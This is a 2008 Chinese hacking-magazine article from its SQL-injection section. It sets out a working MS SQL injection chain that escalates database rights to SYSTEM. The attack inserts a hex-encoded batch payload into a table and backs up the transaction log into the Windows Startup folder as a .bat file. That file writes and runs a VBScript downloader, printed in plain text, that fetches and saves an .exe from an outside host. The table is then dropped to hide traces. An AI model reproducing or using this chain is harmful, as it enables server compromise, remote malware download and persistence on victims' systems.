《黑客防线》↑在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航


技术文章 - 数据库注入 - 浏览文章 - DB权限FUCK SYSTEM权限
DB权限FUCK SYSTEM权限
http://www.hacker.com.cn/ 2008-6-7 4:39:41 黑客防线
DB权限FUCK SYSTEM

alter database w37910com set RECOVERY FULL-- //打开开关
create table cmd (a image)-- //新建一个名为CMD的表和一个名为A的字段
backup log w37910com to disk = 'c:\cmd1' with init-- //备份到C盘
insert into cmd(a) values (0x1
70656E2022474554222C22687474703A2F2F7777772E33373931302E636F6D2F312E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174
654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E766273200D0A65
63686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022312E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A74200D0A)--
(关键是在这里这里他妈的0D0A在16进制里面就是回车符的意思我肏可能有兄弟问130a0d0A是什么意思?这他妈的意思就是DOUBLE回车。后面的0D0A也是一个回车这他妈都是怕有垃圾字符,肏!那个代码也贴出来给兄弟们
echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.37910.com/1.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "1.exe",2 >>k.vbs
k.vbs
t
注意这段代码上面是两个回车 下面一个回车)
backup log w37910com to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--//主角备份到这个目录
drop table cmd-- //擦屁眼儿
都运行完了就可以等死了。
感谢猫公子同学的帮助,当然还有鸟人高春雷。
THE END!
所属分类: 数据库注入   所属专题:
共有 610 人次浏览 收藏本页 返回上一页
相关文章
    评论作者:
    电子邮件:
    评论内容:
    投票评价:
    验 证 码:
    图片包含4个随机字符,点击刷新
    请输入上面图片中的随机字符